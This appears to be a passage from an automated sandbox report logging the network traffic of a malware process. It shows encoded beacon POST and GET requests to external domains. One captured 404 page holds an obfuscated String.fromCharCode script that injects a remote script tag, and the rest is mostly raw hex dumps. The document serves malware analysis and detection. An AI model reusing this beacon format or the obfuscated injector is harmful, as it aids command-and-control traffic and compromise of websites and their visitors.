                                                                                                                    Data Raw: 51 7a 6a 3d 4a 75 42 30 31 51 4c 52 4d 6f 47 31 7a 35 71 75 2b 58 43 53 6e 4d 61 50 59 36 2f 4a 79 59 7a 53 4e 52 57 6c 37 6f 53 2f 37 54 34 31 30 4c 6b 36 42 52 59 2b 6e 43 7a 32 71 59 48 32 43 31 39 72 75 65 33 2b 4a 75 66 68 59 73 31 69 36 41 36 63 30 35 41 37 48 49 53 4d 61 4c 72 43 6d 53 73 41 2f 61 6e 77 74 6b 47 51 6b 6c 6b 55 70 33 31 2f 68 4a 5a 55 45 2b 4a 6b 46 4a 48 62 69 47 30 48 6a 35 34 78 74 66 31 44 48 6d 51 52 79 6a 6a 7a 6c 45 38 48 73 4d 4f 48 4e 31 79 52 56 62 47 63 72 41 30 78 4b 35 79 59 41 42 34 69 43 71 35 62 63 4e 34 63 61 56 47 74 79 7a 76 6d 31 45 2f 50 74 51 41 6f 50 65 49 63 70 78 49 71 6f 55 7a 64 34 4d 4d 56 45 7a 7a 63 50 4a 48 49 4b 6e 43 69 6c 57 6d 53 4d 55 42 34 7a 58 63 68 70 77 75 6c 44 37 71 6e 4d 2f 42 61 55 39 46 70 2f 42 36 44 72 59 58 79 72 51 77 31 30 4d 4e 49 51 41 75 5a 62 78 76 38 54 2f 6b 47 57 73 46 36 4d 76 68 55 5a 44 67 6f 71 6f 74 63 77 67 2b 42 69 6a 57 35 41 6c 73 63 4a 4a 5a 4f 43 6b 45 58 47 74 36 55 4f 41 4f 6a 49 70 33 6f 7a 67 66 6f 63 2f [TRUNCATED]
                                                                                                                    Data Ascii: Qzj=JuB01QLRMoG1z5qu+XCSnMaPY6/JyYzSNRWl7oS/7T410Lk6BRY+nCz2qYH2C19rue3+JufhYs1i6A6c05A7HISMaLrCmSsA/anwtkGQklkUp31/hJZUE+JkFJHbiG0Hj54xtf1DHmQRyjjzlE8HsMOHN1yRVbGcrA0xK5yYAB4iCq5bcN4caVGtyzvm1E/PtQAoPeIcpxIqoUzd4MMVEzzcPJHIKnCilWmSMUB4zXchpwulD7qnM/BaU9Fp/B6DrYXyrQw10MNIQAuZbxv8T/kGWsF6MvhUZDgoqotcwg+BijW5AlscJJZOCkEXGt6UOAOjIp3ozgfoc/QdH7IE7yxxhtHQTJf9zmu3xHBvsKflCDTkSNtC0nLB8ffsnexp5h73L8bVUGPjsth0rbs/1ZDcFqxV7q/U8yAcmDG0SyhCrqrO7N6Xs4ygroxRBUrGAquEmwQiHwJc29eizlZpHh+4Z9+EBJiZJGrcnNcAxOgvrdRT1fbC2s97LU+azsNrtqt1kkFcGCbF0nhUIJNe6xn0CRGkDqvwn0WNmD2QWRBlorQBB6XoHIOn7Y536Yn9/vKRcz+q3rwNRjpqU0XsLaY33AQHzb5+esm3bWJLzft3xHc+/A0MvreeRbuCeyjbpL3iDyanklv779auMThkO1ejt7H+4Fdm/DFsWUXwgfiKBQCAgDYNpx22qxYFdDzGI7KPrO0vYbc+ZCJTq3XgpWJQ1vUQeJGBpx5Qdk/+rOXz+OfQoIVV9Aq/wCfLSSZBdO4j0WMCxitvoUPprXj9OY800dQyD74OurHf6OCZ4MpPEO7EqCqeZ+65LKcHSt+SN70kPnvXTQafKxG9ky52H7EOtoBoRHA1T3ZrZg/uBTMI7Zf1qzqdtuDffmYsH6hZFT8SpvRuXqOAOSn6t7cGZouujMPW4Z6urZRJ/CEccMxdR+2TW2+r2BwS6vV2ORwG6FEFczgf9lpArUtYCkjOXvOGxZi/il3pay59S4rpHuKVOzRp [TRUNCATED]
                                                                                                                    Oct 24, 2024 05:09:17.645891905 CEST1103INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:17 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gW5Y%2BtdrBNn0eCSRxXwz5fNrePCN8Ku0WDxlCdytp%2BM8eAHlk%2Be2fKMj8x7xg72%2Fw4CuRxZHQtM8LQzhOTsDqvSHB5IPmj6AO37SV7cmVjVniXVZXjb2E4uzp27Nzg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c465f8b88c56-DFW
                                                                                                                    Content-Encoding: gzip
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1441&sent=4&recv=11&lost=0&retrans=0&sent_bytes=0&recv_bytes=10882&delivery_rate=0&cwnd=133&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 31 32 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 92 c1 6e c3 20 0c 86 ef 95 fa 0e 3e b6 92 d5 40 02 a4 51 19 97 4a 3b ee b2 27 c8 12 da 44 6a c8 c4 e8 96 bd fd e4 04 a2 a9 87 ed 80 31 f6 e7 1f 0c e8 2e 0c 37 b3 dd e8 ce d6 ad d1 a1 0f 37 6b 04 13 f0 32 06 78 1e ef ae d5 d9 12 d4 d9 8c 6c 37 fa 6d 6c bf 69 6e ac 0b d6 1b dd f1 c7 8a 8e 1b 9d c5 34 69 7b 93 60 77 ed dd f4 3b 97 cd 6a fa a3 f1 fd 7b 30 9f b5 87 29 c0 13 bc 06 df bb eb e1 e2 c7 e1 dc d5 fe 3c b6 76 a7 18 02 e7 12 a1 aa c8 11 08 9c 49 f2 72 32 0a a1 20 87 1d 11 aa 92 22 84 b3 82 bc 32 86 e6 15 e3 08 8a 23 14 02 39 53 09 5e ab fe d2 17 71 0f 2e 23 40 e4 aa 25 22 16 4d 02 e5 11 41 94 cb 88 95 1c 41 28 04 49 59 9a 29 93 f3 64 18 c3 99 23 64 3e c1 72 9e 24 c1 54 d4 79 58 c9 24 cf ca 45 24 0a 54 18 db 58 23 a9 84 fa 51 39 02 5d ac f8 af 79 95 ef 4f ed d8 dc 07 eb c2 e1 cb f7 c1 ee a6 b0 3f e9 2c 3e 1d bd 65 fc 4c 3f c2 ab eb 02 55 02 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                    Data Ascii: 12an >@QJ;'Dj1.77k2xl7mlin4i{`w;j{0)<vIr2 "2#9S^q.#@%"MAA(IY)d#d>r$TyX$E$TX#Q9]yO?,>eL?U0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    36192.168.2.450038104.21.78.104805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:19.138901949 CEST526OUTGET /vshw/?Qzj=EspU2mytRZKz4auAzVKL1tfZdJmh9evbelDltaue1VIW4sYIVCILyk3Sg5ScN2hRjv7eCPLeVYxJkFe87LUrFuvYQ7vdzmgwzIu85Xz/vDtptw9jh7A1S+4=&Znyl=2rnxDB HTTP/1.1
                                                                                                                    Host: www.ly0.xyz
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Oct 24, 2024 05:09:20.179879904 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Date: Thu, 24 Oct 2024 03:09:20 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    cf-cache-status: DYNAMIC
                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jOxXELJguHuA8U6BWE2fDzZO9OKb4o4v4ACi946djCpWWTlsQDk2wBNCbyPLHvExBjPriVkj5%2F2CKJcANSEng4PryUwkwlB%2B4McS%2BrwKk7WQyLCb7bKq93%2FCuUQ%2Bjg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                    Server: cloudflare
                                                                                                                    CF-RAY: 8d76c475eda82c93-DFW
                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1762&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=526&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                    Data Raw: 32 35 35 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 73 63 72 69 70 74 3e 76 61 72 20 78 74 20 3d 20 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 36 30 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31 31 32 2c 20 31 31 36 2c 20 33 32 2c 20 31 30 38 2c 20 39 37 2c 20 31 31 30 2c 20 31 30 33 2c 20 31 31 37 2c 20 39 37 2c 20 31 30 33 2c 20 31 30 31 2c 20 36 31 2c 20 33 34 2c 31 30 36 2c 20 39 37 2c 20 31 31 38 2c 20 39 37 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31 31 32 2c 20 31 31 36 2c 20 33 34 2c 20 33 32 2c 20 31 31 35 2c 20 31 31 34 2c 20 39 39 2c 20 36 31 2c 20 33 34 2c 31 30 34 [TRUNCATED]
                                                                                                                    Data Ascii: 255<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body><script>var xt = String.fromCharCode(60, 115, 99, 114, 105, 112, 116, 32, 108, 97, 110, 103, 117, 97, 103, 101, 61, 34,106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 34, 32, 115, 114, 99, 61, 34,104, 116, 116, 112, 115, 58, 47, 47, 115, 111, 46, 55, 56, 57, 121, 121, 100,115, 46, 105, 99, 117, 47, 106, 115, 47, 106, 115, 45, 1
                                                                                                                    Oct 24, 2024 05:09:20.179960012 CEST141INData Raw: 31 35 2c 20 31 30 37 2c 20 31 30 30 2c 20 34 36 2c 20 31 30 39 2c 31 30 35 2c 20 31 31 30 2c 20 34 36 2c 20 31 30 36 2c 20 31 31 35 2c 20 33 34 2c 20 36 32 2c 20 36 30 2c 20 34 37 2c 20 31 31 35 2c 20 39 39 2c 20 31 31 34 2c 20 31 30 35 2c 20 31
                                                                                                                    Data Ascii: 15, 107, 100, 46, 109,105, 110, 46, 106, 115, 34, 62, 60, 47, 115, 99, 114, 105, 112, 116, 62);document.write(xt);</script></html>0


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    37192.168.2.45003968.66.226.116805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:25.259735107 CEST798OUTPOST /kgyd/ HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.myrideguy.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 200
                                                                                                                    Referer: http://www.myrideguy.net/kgyd/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 70 49 56 38 56 6b 47 64 6f 54 4b 49 2b 59 4a 75 4d 34 50 59 42 30 4c 79 67 2b 4e 73 2b 2b 68 4f 36 57 45 44 35 39 6b 4e 49 67 55 4d 33 62 7a 6c 41 42 6d 68 69 74 50 69 65 6d 4c 54 38 6f 52 34 34 34 78 53 62 42 76 75 53 58 43 78 6b 69 32 52 75 31 59 2b 53 72 37 62 6e 4f 69 71 70 66 70 6a 43 6e 65 50 79 64 31 74 49 4b 64 58 58 6c 73 78 65 34 38 66 2b 7a 57 38 6d 70 4e 70 62 4b 39 69 6e 39 48 4a 34 2f 4b 73 48 41 2b 66 64 37 71 39 65 37 6b 65 74 34 77 4c 51 71 64 50 31 6d 64 46 6e 7a 57 79 66 41 74 51 4d 77 41 4a 79 69 70 6a 56 34 5a 4b 53 51 3d 3d
                                                                                                                    Data Ascii: Qzj=bsfnI4LRERSmpIV8VkGdoTKI+YJuM4PYB0Lyg+Ns++hO6WED59kNIgUM3bzlABmhitPiemLT8oR444xSbBvuSXCxki2Ru1Y+Sr7bnOiqpfpjCnePyd1tIKdXXlsxe48f+zW8mpNpbK9in9HJ4/KsHA+fd7q9e7ket4wLQqdP1mdFnzWyfAtQMwAJyipjV4ZKSQ==
                                                                                                                    Oct 24, 2024 05:09:26.712548018 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:26 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    x-litespeed-tag: b37_HTTP.404
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    transfer-encoding: chunked
                                                                                                                    content-encoding: gzip
                                                                                                                    vary: Accept-Encoding
                                                                                                                    date: Thu, 24 Oct 2024 03:09:26 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    Data Raw: 34 35 39 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 ec 6a 38 0c 3d ea e0 98 06 fe b6 e7 fe ed 7b 14 [TRUNCATED]
                                                                                                                    Data Ascii: 459f}kw?e^tw8N>$IHe{vM"`0_>^r\v5/f?PjFqF`d^iP`w7cc0H}<;s|<&%0`j]POc==rGvMoh'PHGN0F:Gl!E >.<@'SK\l|xiKFj8={r<E`^cZOm[6j?#;@Di`aJ`[@02a2$}=_b(Fc2o=
                                                                                                                    Oct 24, 2024 05:09:26.712635040 CEST1236INData Raw: 32 26 7e 5c a0 01 e9 27 31 19 2f c7 fe ca 93 a0 61 10 51 a8 bc d6 33 6b 1a 08 56 eb 69 ef 83 31 49 89 2d 42 a3 d5 34 9f dc 0a 44 cb eb 92 d3 bc af ad c3 73 19 8b ca b9 95 73 fe 31 88 d1 71 90 f8 2e e4 33 72 43 83 24 5a c6 9f c2 d9 6f 2a 6f 9f d8
                                                                                                                    Data Ascii: 2&~\'1/aQ3kVi1I-B4Dss1q.3rC$Zo*oWdSK%S`Q ]=5D:y23qB)KxR3ThtYihBv_^P/jRr>IV-L#VZA-1e
                                                                                                                    Oct 24, 2024 05:09:26.712687016 CEST1236INData Raw: 00 cc ff 8b cb f7 af bb da 84 51 98 6a e8 e3 c0 25 bd 1b c2 60 ba e2 e9 1e d3 7e ab cd 14 e4 e3 d3 92 92 cc d3 7e bb 63 41 8c 63 d2 33 3b 86 4b 86 2b 76 27 47 e8 74 36 88 ad d0 95 52 fb b0 2d a6 85 d1 f6 24 08 f8 94 93 39 64 1b 47 11 89 a3 6d c7
                                                                                                                    Data Ascii: Qj%`~~cAc3;K+v'Gt6R-$9dGmFu[1`g<D,s9[$2~Nlkc2=0qzT(7S{8A3v=[eY\Y3)LJc&9*9\,C1-aXjxfi%DD14g]'bh5
                                                                                                                    Oct 24, 2024 05:09:26.712734938 CEST1236INData Raw: 03 37 bb 05 f4 3e df d2 1f 61 77 6d de 6d db e8 b6 3a b5 57 b6 e9 b8 ce a0 80 7c 4c 5d 3f 53 d8 b5 b4 c7 32 ec 8e 59 7b 65 75 da 8d 81 b3 25 b6 88 b2 0d a8 bc d7 96 77 a1 f8 c6 86 d8 66 aa 82 b1 d2 61 46 54 9f 1b 85 4a b8 dc ae cd 37 26 29 47 60
                                                                                                                    Data Ascii: 7>awmm:W|L]?S2Y{eu%wfaFTJ7&)G`4JM?_/R{OT(1/xE|1K|=|U?p<Yro[XvR"Yu*}Ogreq<`czok-8(-6N
                                                                                                                    Oct 24, 2024 05:09:26.712783098 CEST848INData Raw: 8d 03 24 e6 f5 b5 59 47 4a 79 2c e2 ec cc 05 cb 68 ac c7 a1 3a 7e 3e 1f 8f 4a 74 df aa 5c 66 d5 7a 02 26 a5 84 9e 86 47 97 e2 61 e0 63 2f 9b 53 00 8b ea 84 65 2e 8b 88 af 06 e7 b3 90 e2 5b cc a7 a4 b4 32 9f 0f 6f f1 65 9c 2a ed de 5c 55 a8 cd 95
                                                                                                                    Data Ascii: $YGJy,h:~>Jt\fz&Gac/Se.[2oe*\UxU<qZ2V>TW0KO&B*.c~6Lk}uj.Nrl/ IF\8]s=ZE0Z^t:l"h^0*7!^Qei=d
                                                                                                                    Oct 24, 2024 05:09:26.712835073 CEST1236INData Raw: 10 33 8d 36 ff 5a 43 2e bd c9 b7 8c a1 e1 cb 1c 40 47 97 1c c0 57 01 19 24 2c 46 36 1b 22 82 56 59 c5 ee 2c 83 55 fc 2e 3b 6a 24 7f 45 89 d9 05 e2 96 12 66 32 af 80 ba c4 dd 2a c4 9c 54 cc 92 97 cc c5 b6 f2 83 0b 10 7c 02 2b 8b d2 49 86 42 52 7a
                                                                                                                    Data Ascii: 36ZC.@GW$,F6"VY,U.;j$Ef2*T|+IBRz&TRqne]Ap+.|k~dQu(OXVJT%x7B1zvfWNJQV&)WWpVk0eR1Tu
                                                                                                                    Oct 24, 2024 05:09:26.712884903 CEST1236INData Raw: 86 05 19 96 2e 81 83 bc ea 58 2a 9e 03 01 b9 19 ea 54 aa 39 e1 ec 5e 38 24 2e 86 13 92 5c e9 a9 28 f9 b8 4f 1e 24 fe 34 4f 04 45 85 e4 14 f9 d2 17 82 66 d9 29 75 91 3a f5 07 f0 48 1d d1 23 87 05 9e 87 ea 6a 99 10 0f a9 2f de aa 03 05 c9 9b 31 95
                                                                                                                    Data Ascii: .X*T9^8$.\(O$4OEf)u:H#j/1eg^>`'CV'ZBqzuTCxcUJ>{T}} oTgwFO=l~{d{/&^X}GO'G0$1
                                                                                                                    Oct 24, 2024 05:09:26.712932110 CEST1236INData Raw: c0 f2 c6 4c 5d 89 0b 40 17 1a 31 be 33 c4 9f b0 cb a5 d7 58 06 98 3d 4b c8 5d a3 73 20 55 47 6c 6b 2e 54 c1 f9 6a 76 e7 c2 65 f7 16 80 60 1a 73 a1 9c 11 71 ae d3 67 09 17 d3 cd 6d 4a 5e 95 f9 35 81 77 7c 33 8c 15 d6 69 49 65 15 a8 85 95 55 e0 72
                                                                                                                    Data Ascii: L]@13X=K]s UGlk.Tjve`sqgmJ^5w|3iIeUrTEJ4\L4)59>{[}/{F;7`!+N?($|DwjXKH?/&xf7PTZ-
                                                                                                                    Oct 24, 2024 05:09:26.712980986 CEST1236INData Raw: 9a 2e 22 ec 86 3a 24 da d6 f6 2e d2 9f 7f 8e 7a 8d 82 10 ea 34 0a c2 3f 45 7d 62 b0 82 e3 c0 a7 d8 83 b6 ba 54 3e ff 14 f5 eb 43 74 97 3f dc d6 f6 0e c4 2f 59 ab ed c4 13 7f e5 33 4e e1 45 9a fd 50 7e 8b 9f 6f c0 e7 21 5c 85 7c 8a 99 71 08 61 37
                                                                                                                    Data Ascii: .":$.z4?E}bT>Ct?/Y3NEP~o!\|qa7j4EYZfU1's]];yN=cp(>|a[rKB7zd!rnw5Z)jU@ap`|ecXCn.45iN
                                                                                                                    Oct 24, 2024 05:09:26.713033915 CEST848INData Raw: 56 df eb 2c ac f1 d2 cd cc a6 a3 db 75 1b 19 7a 0b de a4 d5 5b a8 85 0c 78 6d b5 de 84 6f 64 d6 6d 64 d7 db 9e 6e d7 3b 08 fe 98 75 93 ff b1 eb 1d 48 73 4c 54 ef 20 ab 6e 67 90 e9 bf 36 32 50 4b 07 0c 2d bd 75 61 b6 ea 36 6a 22 20 f7 63 6c f0 45
                                                                                                                    Data Ascii: V,uz[xmodmdn;uHsLT ng62PK-ua6j" clE[&2F[F_(BXj7UNJ't{=/bX[Q^#Z^4M1d8X0%900")a)??sc_tO_.tR1.O
                                                                                                                    Oct 24, 2024 05:09:26.718904018 CEST1236INData Raw: c2 8c 6b c3 b2 36 ec 7d 3e c1 d9 b0 0e 37 2c 6b e2 1c f0 1e 75 18 f8 03 3a 14 d9 02 8b e8 8b 5f 98 97 26 5a 16 48 03 7e 35 0f 37 ac 63 f1 77 41 30 22 49 76 67 f1 9d f6 e9 34 53 76 ec 14 8d 65 09 46 40 6a fb 21 fd 1c 24 31 89 54 3e d2 82 8e f8 37
                                                                                                                    Data Ascii: k6}>7,ku:_&ZH~57cwA0"Ivg4SveF@j!$1T>71S20o"HsrKh<;sV0$uc7C-y<`Cd<rKU&lk}f<yL?A^7']p'FZ\{t^Dq


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.45004068.66.226.116805568C:\Program Files (x86)\XRApqxhkIyHgvDmGFleqsIqdQHhMIUjYQWNDwjmeboQrqqChwUyXueWxdm\gNKNuXuipEBZec.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Oct 24, 2024 05:09:27.818133116 CEST818OUTPOST /kgyd/ HTTP/1.1
                                                                                                                    Host: www.myrideguy.net
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Origin: http://www.myrideguy.net
                                                                                                                    Connection: close
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Content-Length: 220
                                                                                                                    Referer: http://www.myrideguy.net/kgyd/
                                                                                                                    User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4
                                                                                                                    Data Raw: 51 7a 6a 3d 62 73 66 6e 49 34 4c 52 45 52 53 6d 76 70 46 38 58 44 53 64 68 54 4b 4a 39 59 4a 75 46 59 50 63 42 30 48 79 67 2b 6b 68 2b 4d 31 4f 39 33 30 44 34 38 6b 4e 50 67 55 4d 34 37 79 74 66 52 6d 71 69 74 54 41 65 69 4c 54 38 6f 46 34 34 34 42 53 62 77 76 74 54 48 43 33 38 53 32 66 71 31 59 2b 53 72 37 62 6e 4f 65 54 70 66 68 6a 43 33 75 50 7a 38 31 73 4f 36 64 55 64 46 73 78 61 34 38 62 2b 7a 57 65 6d 72 6f 30 62 49 56 69 6e 35 44 4a 37 72 65 6a 51 51 2b 5a 53 62 72 73 66 72 67 51 67 74 4e 2f 4f 4c 4a 6a 2f 31 35 41 76 56 48 6f 4f 78 4d 48 65 77 6b 36 76 6c 67 58 59 37 6b 44 4a 59 72 56 4b 72 42 42 41 65 64 77 33 63 44 44 61 62 35 36 68 61 55 3d
                                                                                                                    Data Ascii: Qzj=bsfnI4LRERSmvpF8XDSdhTKJ9YJuFYPcB0Hyg+kh+M1O930D48kNPgUM47ytfRmqitTAeiLT8oF444BSbwvtTHC38S2fq1Y+Sr7bnOeTpfhjC3uPz81sO6dUdFsxa48b+zWemro0bIVin5DJ7rejQQ+ZSbrsfrgQgtN/OLJj/15AvVHoOxMHewk6vlgXY7kDJYrVKrBBAedw3cDDab56haU=
                                                                                                                    Oct 24, 2024 05:09:29.234895945 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                    Connection: close
                                                                                                                    x-powered-by: PHP/7.4.33
                                                                                                                    x-dns-prefetch-control: on
                                                                                                                    set-cookie: mailchimp_landing_site=https%3A%2F%2Fmyrideguy.net%2Fkgyd%2F; expires=Thu, 21-Nov-2024 03:09:28 GMT; Max-Age=2419200; path=/; secure; SameSite=Strict
                                                                                                                    x-litespeed-tag: b37_HTTP.404
                                                                                                                    expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                                    link: <https://myrideguy.net/wp-json/>; rel="https://api.w.org/"
                                                                                                                    x-litespeed-cache-control: no-cache
                                                                                                                    cache-control: no-cache, no-store, must-revalidate, max-age=0
                                                                                                                    transfer-encoding: chunked
                                                                                                                    content-encoding: gzip
                                                                                                                    vary: Accept-Encoding
                                                                                                                    date: Thu, 24 Oct 2024 03:09:29 GMT
                                                                                                                    server: LiteSpeed
                                                                                                                    strict-transport-security: max-age=63072000; includeSubDomains
                                                                                                                    x-frame-options: SAMEORIGIN
                                                                                                                    x-content-type-options: nosniff
                                                                                                                    Data Raw: 34 35 39 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dc 7d 6b 77 db b8 d1 f0 e7 e4 9c f7 3f a0 cc f1 13 bb 15 65 5e 74 77 ec d6 97 38 f1 c6 4e dc d8 c9 3e bb cd 1e 1f 88 84 24 c4 14 c9 05 49 cb 8a eb ff fe 9e 01 48 02 a4 a8 8b 65 7b 9f 76 b7 4d 22 02 83 99 c1 60 30 00 06 03 e0 cd 5f 8e 3e 1d 5e fe 72 fe 16 8d e2 b1 b7 f7 f2 0d fc 83 5c ca 76 35 2f 66 1a f2 b0 3f dc d5 88 af 7f b9 d0 50 c8 c8 80 de ee 6a c1 b0 87 46 71 1c 46 bd ed ed 60 18 d6 c7 64 db 8f 5e 69 50 9a 60 77 ef e5 8b 37 63 12 63 e4 8c 30 8b 48 bc ab 7d b9 3c d6 3b 1a da ce 73 7c 3c 26 bb da 0d 25 93 30 60 b1 86 9c c0 8f 89 1f ef 6a 13 ea c6 a3 5d 97 dc 50 87 e8 fc a3 86 a8 4f 63 8a 3d 3d 72 b0 47 76 4d 8e e7 e5 8b 17 6f fe a2 eb 68 df f3 10 f5 d1 27 9f a0 8b b7 9f 50 a3 de ae 1b 48 47 98 06 11 09 ea 4e 30 46 ba be f7 ff 00 3a a6 b1 47 f6 de 6c 8b 7f 21 45 e1 84 05 fd 20 8e 14 3e fc 80 fa 2e b9 15 3c 17 40 87 c4 27 0c c7 01 53 a0 4b 5c 6c ee 9f 7c ba 78 fb 69 4b b0 93 e1 88 1c 46 c3 18 c5 d3 90 